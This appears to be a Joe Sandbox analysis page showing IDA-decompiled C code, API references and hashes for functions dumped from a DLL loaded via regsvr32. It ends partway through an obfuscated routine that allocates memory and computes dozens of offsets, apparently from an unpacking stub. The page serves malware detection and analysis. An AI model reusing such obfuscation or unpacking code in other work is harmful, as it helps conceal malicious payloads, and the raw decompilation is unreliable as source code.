Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free
String ID: <w$AGn
API String ID: 269201875-1564128325
Opcode ID: 343fd5df5cabcd101e6f2d7c2bb34fa52e0fe2ff583d59a2d36d2ebe3f3257a1
Instruction ID: 0846c536a4166e2a4b72dac9210c82759c3373816533715847420333fb5a09a4
Opcode Fuzzy Hash: 343fd5df5cabcd101e6f2d7c2bb34fa52e0fe2ff583d59a2d36d2ebe3f3257a1
Instruction Fuzzy Hash: E3316E7190424AAFCB01DFE9D884FDA77B8EF84314F11056AE9149B390EB729D55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E463AF6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E6E463AF6(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				char _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x6e474024; // 0xb68207cc
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E6E463691(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E6E463702(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x6e474610)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t13 =  &_v28; // 0x6e463949
										_t57 = GetCPInfo(_t78, _t13);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x6e4759a0 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											_t14 = _t95 + 0x18; // 0x6e464ee0
											E6E45B880(_t92, _t14, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t25 = _t95 + 0x1a; // 0x6e464ee2
												_t76 = _t25;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												_t26 = _t95 + 4; // 0x89f38bc7
												 *((intOrPtr*)(_t95 + 0x21c)) = E6E463653( *_t26);
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t12 = _t95 + 0xc; // 0x6e464ed4
										_t92 = _t12;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E6E463767(_t90, _t95); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					_t28 = _t95 + 0x18; // 0x6e464ee0
					E6E45B880(_t92, _t28, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x6e474620;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x6e474608; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E6E463653(_t78);
					_t46 = _t95 + 0xc; // 0x6e464ed4
					_t85 = _t46;
					_t90 = _v36 + 0x6e474614;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t49 = _t85 + 2; // 0x498bb05d
						_t85 = _t49;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E6E45AF4F(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

0x6e463af6
0x6e463afe
0x6e463b05
0x6e463b0a
0x6e463b16
0x6e463b1b
0x6e463cd1
0x6e463cd2
0x00000000
0x6e463b21
0x6e463b21
0x6e463b23
0x6e463b25
0x6e463b27
0x6e463b2a
0x6e463b36
0x6e463b37
0x6e463b3a
0x6e463b42
0x00000000
0x6e463b44
0x6e463b4a
0x6e463c21
0x6e463c21
0x6e463b50
0x6e463b54
0x6e463b5c
0x00000000
0x6e463b62
0x6e463b69
0x6e463b91
0x6e463b96
0x6e463b9c
0x6e463b9e
0x6e463c15
0x6e463c1b
0x00000000
0x00000000
0x00000000
0x00000000
0x6e463ba0
0x6e463ba5
0x6e463baa
0x6e463bb2
0x6e463bb5
0x6e463bb9
0x6e463bbf
0x6e463bc1
0x6e463bc5
0x6e463bc8
0x6e463bca
0x6e463bca
0x6e463bcd
0x6e463bcf
0x00000000
0x00000000
0x6e463bd1
0x6e463bd4
0x6e463bdf
0x6e463bdf
0x6e463be1
0x00000000
0x00000000
0x6e463bd9
0x6e463bde
0x6e463bde
0x6e463bde
0x6e463be3
0x6e463be6
0x6e463be9
0x00000000
0x00000000
0x00000000
0x6e463be9
0x6e463bca
0x6e463beb
0x6e463beb
0x6e463beb
0x6e463bee
0x6e463bf3
0x6e463bf3
0x6e463bf6
0x6e463bf7
0x6e463bf7
0x6e463bf7
0x6e463bfc
0x6e463c06
0x6e463c0f
0x6e463c0f
0x00000000
0x6e463bbf
0x6e463b6b
0x6e463b6b
0x6e463b6e
0x6e463b74
0x6e463b77
0x6e463b7b
0x6e463b7b
0x6e463b80
0x6e463b80
0x6e463b83
0x6e463b84
0x6e463b85
0x6e463b86
0x6e463b87
0x6e463cd7
0x6e463cd7
0x6e463cd9
0x6e463b69
0x6e463b5c
0x6e463b4a
0x00000000
0x6e463b42
0x6e463c2e
0x6e463c33
0x6e463c3b
0x6e463c3b
0x6e463c3f
0x6e463c42
0x6e463c48
0x6e463c4b
0x6e463c4b
0x6e463c4e
0x6e463c50
0x6e463c52
0x6e463c52
0x6e463c55
0x6e463c57
0x00000000
0x00000000
0x6e463c59
0x6e463c5c
0x6e463c78
0x6e463c78
0x6e463c7a
0x00000000
0x00000000
0x6e463c61
0x6e463c67
0x6e463c69
0x6e463c6f
0x6e463c73
0x6e463c73
0x6e463c74
0x00000000
0x6e463c74
0x00000000
0x6e463c67
0x6e463c7c
0x6e463c7f
0x6e463c82
0x00000000
0x00000000
0x00000000
0x6e463c82
0x6e463c84
0x6e463c84
0x6e463c87
0x6e463c88
0x6e463c8b
0x6e463c8e
0x6e463c8e
0x6e463c94
0x6e463c97
0x6e463ca6
0x6e463caf
0x6e463caf
0x6e463cb4
0x6e463cba
0x6e463cbb
0x6e463cbb
0x6e463cbe
0x6e463cc1
0x6e463cc4
0x6e463cc4
0x6e463cc7
0x6e463cc7
0x6e463cc7
0x00000000
0x6e463ccc
0x6e463cda
0x6e463ce8

APIs

Part of subcall function 6E463691: GetOEMCP.KERNEL32(00000000,6E463902,6E464EC8,00000000,00000000,00000000,00000000,?,6E464EC8), ref: 6E4636BC

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6E463949,?,00000000,6E464EC8,00013385,?,?,?,?,00000000), ref: 6E463B54
GetCPInfo.KERNEL32(00000000,I9Fn,?,?,6E463949,?,00000000,6E464EC8,00013385,?,?,?,?,00000000,00000000), ref: 6E463B96

Strings

I9Fn, xrefs: 6E463B91, 6E463B94

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: I9Fn
API String ID: 546120528-3771445864
Opcode ID: 42432bbce3a9aa6a1afe4c8763aed0e56e2c59a6305681f14794a066c53f8aff
Instruction ID: 75b2fcf85a9a9b0113964e980b6b48c337e07dda08a2dbefe6a240bfac5b3b77
Opcode Fuzzy Hash: 42432bbce3a9aa6a1afe4c8763aed0e56e2c59a6305681f14794a066c53f8aff
Instruction Fuzzy Hash: 16510671A043869EDB10CFB9C898FAABBF8EFC1704F10446FE0968B251D7759546CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E45F3ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E45F3ED(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6e45f3f2

APIs

Part of subcall function 6E463F5C: GetEnvironmentStringsW.KERNEL32 ref: 6E463F65
Part of subcall function 6E463F5C: _free.LIBCMT ref: 6E463FC4
Part of subcall function 6E463F5C: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E463FD3

_free.LIBCMT ref: 6E45F42D
_free.LIBCMT ref: 6E45F434

Strings

8_w, xrefs: 6E45F3ED, 6E45F426

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID: 8_w
API String ID: 2490078468-645646398
Opcode ID: b6bd61cc36e031ebe3ced09a2ac9a61a7f931775d3699d9b81a2a4fdccaad51b
Instruction ID: 47b442c55299332a2a9cd6e1ed27fc54c5a0107d86310de2b5b34d57efe3deee
Opcode Fuzzy Hash: b6bd61cc36e031ebe3ced09a2ac9a61a7f931775d3699d9b81a2a4fdccaad51b
Instruction Fuzzy Hash: D1E0E522A4681009AA3126FF7800EAD17095B93338B61076BD924CB3C5DBA4841302D7

Uniqueness

Uniqueness Score: -1.00%

Function 6E4682A4 Relevance: 4.7, APIs: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E6E4682A4(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6e474024; // 0xb68207cc
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E6E4692D3(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E6E463DF2(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E6E45AF4F(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E6E467BEA(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E6E463DF2(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t53 = E6E461496(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t53;
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E6E461496(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E6E467BEA(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E6E463E6E();
									if(_t95 != 0) {
										E6E467BEA(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E6E461AF9(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E6E46ACA0(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E6E461496(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E6E461AF9(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E6E46ACA0(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x6e4682a9
0x6e4682aa
0x6e4682ab
0x6e4682b2
0x6e4682b7
0x6e4682bd
0x6e4682c3
0x6e4682c9
0x6e4682cc
0x6e4682cc
0x6e4682cf
0x6e4682d1
0x6e4682d1
0x6e4682cf
0x6e4682d3
0x6e4682d8
0x6e4682df
0x6e4682e2
0x6e4682e2
0x6e468303
0x6e468305
0x6e468308
0x6e46830d
0x6e46846b
0x6e46846e
0x6e46846f
0x6e468470
0x6e46847c
0x6e468313
0x6e468316
0x6e46831b
0x6e46831d
0x6e46831f
0x6e468356
0x6e468358
0x6e46835a
0x6e468460
0x6e468460
0x6e468462
0x6e468463
0x6e468469
0x00000000
0x6e468469
0x6e468369
0x6e46836e
0x6e468373
0x00000000
0x00000000
0x6e468379
0x6e46838b
0x6e468390
0x6e468394
0x00000000
0x00000000
0x6e46839a
0x6e4683a2
0x6e4683df
0x6e4683e4
0x6e4683e6
0x6e4683e8
0x6e468419
0x6e46841b
0x6e46841d
0x6e468459
0x6e46845a
0x00000000
0x6e46843a
0x6e46843c
0x6e46843d
0x6e468441
0x6e46847d
0x6e468480
0x6e468443
0x6e468443
0x6e468444
0x6e468444
0x6e468445
0x6e468446
0x6e468447
0x6e468448
0x6e468450
0x6e468457
0x6e468486
0x00000000
0x00000000
0x00000000
0x00000000
0x6e468457
0x6e46841d
0x6e4683ec
0x6e468407
0x6e46840c
0x00000000
0x00000000
0x6e46840e
0x6e468414
0x6e468414
0x00000000
0x6e468414
0x6e4683ee
0x6e4683f3
0x6e4683f7
0x00000000
0x00000000
0x6e4683f9
0x00000000
0x6e4683f9
0x6e4683a4
0x6e4683a9
0x00000000
0x00000000
0x6e4683b1
0x00000000
0x00000000
0x6e4683cd
0x6e4683d1
0x00000000
0x00000000
0x00000000
0x6e4683d7
0x6e468326
0x6e468341
0x6e468346
0x6e468351
0x6e468351
0x00000000
0x6e468351
0x6e468348
0x6e46834e
0x6e46834e
0x00000000
0x6e46834e
0x6e468328
0x6e46832d
0x6e468331
0x00000000
0x00000000
0x6e468333
0x00000000
0x6e468333

APIs

__freea.LIBCMT ref: 6E46845A

Part of subcall function 6E461AF9: HeapAlloc.KERNEL32(00000000,?,00000004,?,6E464754,?,00000000,?,6E46030E,?,00000004,?,?,?,?,6E45F737), ref: 6E461B2B

__freea.LIBCMT ref: 6E468463
__freea.LIBCMT ref: 6E468486

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: __freea$AllocHeap
String ID:
API String ID: 85559729-0
Opcode ID: c16eea0a9e24e3689e0ad3c9b27dde220a6d3f6fd6f7ae78a01a1bc7e2bdf7be
Instruction ID: 217f7378ab9b1137fe96a86770d0ee5428847d47c269275717f75f7382ddb8cc
Opcode Fuzzy Hash: c16eea0a9e24e3689e0ad3c9b27dde220a6d3f6fd6f7ae78a01a1bc7e2bdf7be
Instruction Fuzzy Hash: 9951B372600216AFEB108EF6DC44EAB37ADEF8A754F15452BFD18A7240E771DC5186A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E44E502 Relevance: 3.9, APIs: 1, Instructions: 2680
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E44E502(void* __eax) {
				void* _t3971;

				 *((intOrPtr*)(_t3971 + 8)) = __eax +  *((intOrPtr*)(_t3971 + 8));
				if( *((intOrPtr*)(_t3971 + 8)) <= 0xfffffebe) {
					VirtualAlloc(0, 0x16a, 0x1000, 4);
				}
				 *(_t3971 - 0xac) =  *((intOrPtr*)(_t3971 + 8)) + 0x4a;
				 *((intOrPtr*)(_t3971 - 0x5dc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x26;
				 *(_t3971 - 0x39c) =  *((intOrPtr*)(_t3971 + 8)) + 0x16e;
				 *(_t3971 - 0xc) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ed;
				 *(_t3971 - 0x3a0) =  *((intOrPtr*)(_t3971 + 8)) + 0xbc;
				 *(_t3971 - 0x3a4) =  *((intOrPtr*)(_t3971 + 8)) + 0x17d;
				 *(_t3971 - 0xb0) =  *((intOrPtr*)(_t3971 + 8)) + 0x27;
				 *((intOrPtr*)(_t3971 - 0x5e0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x55;
				 *(_t3971 - 0x194) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ad;
				 *((intOrPtr*)(_t3971 - 0x5e4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x16d;
				 *(_t3971 - 0x198) =  *((intOrPtr*)(_t3971 + 8)) + 0x1f2;
				 *((intOrPtr*)(_t3971 - 0x19c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x5b;
				 *((intOrPtr*)(_t3971 - 0x5e8)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd9;
				 *(_t3971 - 0x1a0) =  *((intOrPtr*)(_t3971 + 8)) + 0xeb;
				 *((intOrPtr*)(_t3971 - 0x1a4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x52;
				 *((intOrPtr*)(_t3971 - 0x5ec)) =  *((intOrPtr*)(_t3971 + 8)) + 0x15d;
				 *(_t3971 - 0x3a8) =  *((intOrPtr*)(_t3971 + 8)) + 0x71;
				 *(_t3971 - 0xb4) =  *((intOrPtr*)(_t3971 + 8)) + 0x19e;
				 *((intOrPtr*)(_t3971 - 0x3ac)) =  *((intOrPtr*)(_t3971 + 8)) + 0x179;
				 *((intOrPtr*)(_t3971 - 0x5f0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x97;
				 *(_t3971 - 0x1a8) =  *((intOrPtr*)(_t3971 + 8)) + 0x1d7;
				 *(_t3971 - 0x1ac) =  *((intOrPtr*)(_t3971 + 8)) + 0xf9;
				 *(_t3971 - 0x10) =  *((intOrPtr*)(_t3971 + 8)) + 0xdb;
				 *(_t3971 - 0x2c) =  *((intOrPtr*)(_t3971 + 8)) + 0x67;
				 *(_t3971 - 0x1b0) =  *((intOrPtr*)(_t3971 + 8)) + 0x2a;
				 *(_t3971 - 0xb8) =  *((intOrPtr*)(_t3971 + 8)) + 0x174;
				 *(_t3971 - 0x30) =  *((intOrPtr*)(_t3971 + 8)) + 0x1d2;
				 *((intOrPtr*)(_t3971 - 0x1b4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x152;
				 *((intOrPtr*)(_t3971 - 0x3b0)) =  *((intOrPtr*)(_t3971 + 8)) + 0xdf;
				 *((intOrPtr*)(_t3971 - 0x3b4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x104;
				 *((intOrPtr*)(_t3971 - 0xbc)) =  *((intOrPtr*)(_t3971 + 8)) + 0xf4;
				 *((intOrPtr*)(_t3971 - 0x5f4)) =  *((intOrPtr*)(_t3971 + 8)) + 0xb6;
				 *((intOrPtr*)(_t3971 - 0x3b8)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd8;
				 *((intOrPtr*)(_t3971 - 0x3bc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x174;
				 *(_t3971 - 0x1b8) =  *((intOrPtr*)(_t3971 + 8)) + 0x13b;
				 *(_t3971 - 0x3c0) =  *((intOrPtr*)(_t3971 + 8)) + 0x125;
				 *((intOrPtr*)(_t3971 - 0x3c4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1a0;
				 *((intOrPtr*)(_t3971 - 0x3c8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x192;
				 *((intOrPtr*)(_t3971 - 0x3cc)) =  *((intOrPtr*)(_t3971 + 8)) + 0xa2;
				 *((intOrPtr*)(_t3971 - 0x5f8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x101;
				 *((intOrPtr*)(_t3971 - 0x5fc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x96;
				 *((intOrPtr*)(_t3971 - 0x3d0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x14d;
				 *((intOrPtr*)(_t3971 - 0x3d4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x129;
				 *(_t3971 - 0x1bc) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e8;
				 *(_t3971 - 0x14) =  *((intOrPtr*)(_t3971 + 8)) + 0x1d3;
				 *(_t3971 - 0x1c0) =  *((intOrPtr*)(_t3971 + 8)) + 0x1d4;
				 *(_t3971 - 0x18) =  *((intOrPtr*)(_t3971 + 8)) + 0x7f;
				 *((intOrPtr*)(_t3971 - 0x3d8)) =  *((intOrPtr*)(_t3971 + 8)) + 7;
				 *((intOrPtr*)(_t3971 - 0x600)) =  *((intOrPtr*)(_t3971 + 8)) + 0x136;
				 *(_t3971 - 0x1c4) =  *((intOrPtr*)(_t3971 + 8)) + 0x17e;
				 *((intOrPtr*)(_t3971 - 0x604)) =  *((intOrPtr*)(_t3971 + 8)) + 0xc9;
				 *(_t3971 - 0x3dc) =  *((intOrPtr*)(_t3971 + 8)) + 0x6d;
				 *(_t3971 - 0x34) =  *((intOrPtr*)(_t3971 + 8)) + 0x6f;
				 *((intOrPtr*)(_t3971 - 0x3e0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x8c;
				 *((intOrPtr*)(_t3971 - 0x1c8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x13a;
				 *(_t3971 - 0x3e4) =  *((intOrPtr*)(_t3971 + 8)) + 0x115;
				 *((intOrPtr*)(_t3971 - 0x3e8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x130;
				 *(_t3971 - 0x3ec) =  *((intOrPtr*)(_t3971 + 8)) + 0x188;
				 *((intOrPtr*)(_t3971 - 0x3f0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x39;
				 *(_t3971 - 0x3f4) =  *((intOrPtr*)(_t3971 + 8)) + 0x87;
				 *((intOrPtr*)(_t3971 - 0x608)) =  *((intOrPtr*)(_t3971 + 8)) + 0x81;
				 *(_t3971 - 0xc0) =  *((intOrPtr*)(_t3971 + 8)) + 0xbb;
				 *((intOrPtr*)(_t3971 - 0x60c)) =  *((intOrPtr*)(_t3971 + 8)) + 0xfb;
				 *((intOrPtr*)(_t3971 - 0x610)) =  *((intOrPtr*)(_t3971 + 8)) + 0x36;
				 *(_t3971 - 0x38) =  *((intOrPtr*)(_t3971 + 8)) + 0x18e;
				 *(_t3971 - 0x1cc) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ad;
				 *((intOrPtr*)(_t3971 - 0x3f8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x16e;
				 *((intOrPtr*)(_t3971 - 0xc4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c4;
				 *((intOrPtr*)(_t3971 - 0x3fc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x2d;
				 *(_t3971 - 0xc8) =  *((intOrPtr*)(_t3971 + 8)) + 0xf3;
				 *(_t3971 - 0xcc) =  *((intOrPtr*)(_t3971 + 8)) + 0xb4;
				 *(_t3971 - 0xd0) =  *((intOrPtr*)(_t3971 + 8)) + 0x1de;
				 *(_t3971 - 0x3c) =  *((intOrPtr*)(_t3971 + 8)) + 0x12;
				 *((intOrPtr*)(_t3971 - 0xd4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c2;
				 *(_t3971 - 0x400) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b4;
				 *((intOrPtr*)(_t3971 - 0x614)) =  *((intOrPtr*)(_t3971 + 8)) + 0x188;
				 *((intOrPtr*)(_t3971 - 0x404)) =  *((intOrPtr*)(_t3971 + 8)) + 0x97;
				 *((intOrPtr*)(_t3971 - 0x618)) =  *((intOrPtr*)(_t3971 + 8)) + 0xeb;
				 *((intOrPtr*)(_t3971 - 0x408)) =  *((intOrPtr*)(_t3971 + 8)) + 0xe;
				 *(_t3971 - 0x40c) =  *((intOrPtr*)(_t3971 + 8)) + 0x10f;
				 *(_t3971 - 0x40) =  *((intOrPtr*)(_t3971 + 8)) + 0x94;
